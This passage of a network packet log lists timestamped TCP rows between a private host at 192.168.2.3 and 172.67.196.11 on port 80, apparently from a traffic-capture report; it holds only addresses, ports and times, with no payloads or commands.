                                                                                                                          Nov 11, 2021 01:57:46.461123943 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461163044 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461179018 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461201906 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461241007 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461252928 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461280107 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461321115 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461325884 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461359978 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461400032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461407900 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461440086 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461477995 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461486101 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461519003 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461558104 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461569071 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461596966 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461636066 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461643934 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461673975 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461714029 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461728096 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461755037 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461791992 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461807013 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461833000 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461870909 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461877108 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461910009 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461949110 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.461970091 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.461987019 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462027073 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462033033 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462066889 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462105036 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462114096 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462145090 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462186098 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462193012 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462224960 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462264061 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462277889 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462302923 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462342024 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462352037 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462383032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462419987 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462426901 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462460041 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462498903 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462506056 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462534904 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462574959 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462584019 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462613106 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462651968 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462660074 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462692976 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462729931 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462738991 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462769985 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462809086 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462820053 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462853909 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462893009 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462899923 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.462933064 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462971926 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.462980032 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463012934 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463049889 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463068008 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463088989 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463129044 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463136911 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463169098 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463208914 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463227034 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463248014 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463253021 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463288069 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463304043 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463329077 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463345051 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463366985 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463382959 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463407040 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463407993 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463448048 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463454008 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463485003 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463494062 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463525057 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463532925 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463562965 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463572025 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463603020 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463609934 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463644028 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463649988 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463681936 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463691950 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463721991 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463728905 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463762045 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463771105 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463799953 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463815928 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463839054 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463862896 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463885069 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.463923931 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463967085 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.463970900 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.464006901 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.464016914 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.464046001 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.464061022 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.464086056 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.464093924 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.464126110 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.464142084 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.464169025 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.464176893 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.464222908 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.468660116 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.468684912 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.468708992 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.468728065 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.468734026 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.468744040 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.468750000 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.468758106 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.468765974 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.468784094 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.468801022 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.468807936 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.468822956 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.468852997 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.479440928 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481009960 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481051922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481084108 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481116056 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481144905 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481147051 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481178999 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481185913 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481189966 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481194973 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481246948 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481281996 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481307030 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481312990 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481338024 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481352091 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481359959 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481384993 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481411934 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481415987 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481441975 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481463909 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481492996 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481496096 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481507063 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481528044 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481549025 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481559992 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481580973 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481592894 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481611967 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481625080 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481646061 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481682062 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481689930 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481724977 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481750011 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481762886 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481764078 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481794119 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481815100 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481825113 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481854916 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481856108 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481887102 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481904984 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481919050 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481941938 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481951952 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481957912 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.481982946 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.481998920 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482016087 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482038975 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482047081 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482062101 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482079029 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482110023 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482115984 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482129097 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482141972 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482167959 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482176065 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482208014 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482213020 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482222080 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482238054 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482263088 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482270002 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482281923 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482302904 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482321024 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482332945 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482364893 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482369900 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482381105 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482395887 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482419014 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482439041 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482460976 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482486963 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482511997 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482520103 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482525110 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482549906 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482570887 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482582092 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482594013 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482614040 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482634068 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482644081 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482676029 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482681036 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482707024 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482711077 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482722998 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482738018 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482743025 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482770920 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482786894 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482800961 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482817888 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482832909 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482845068 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482866049 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482881069 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482896090 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482913017 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482928038 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482939959 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482959032 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.482975960 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.482991934 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.483005047 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.483037949 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485043049 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485076904 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485101938 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485111952 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485116959 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485147953 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485167980 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485183001 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485198975 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485219002 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485232115 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485254049 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485271931 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485286951 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485301971 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485321999 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485341072 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485356092 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485368967 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485392094 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485402107 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485428095 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485440969 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485460043 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.485476017 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.485567093 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.495904922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.495980978 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.499289989 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499341011 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499403000 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499447107 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.499450922 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499491930 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499500990 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.499532938 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499572992 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499583006 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.499622107 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499670029 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.499675035 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499716997 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499757051 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499762058 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.499799967 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499838114 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499845028 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.499876976 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499917030 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499921083 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.499954939 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.499994993 CET8049752172.67.196.11192.168.2.3
                                                                                                                          Nov 11, 2021 01:57:46.500001907 CET4975280192.168.2.3172.67.196.11
                                                                                                                          Nov 11, 2021 01:57:46.500034094 CET8049752172.67.196.11192.168.2.3
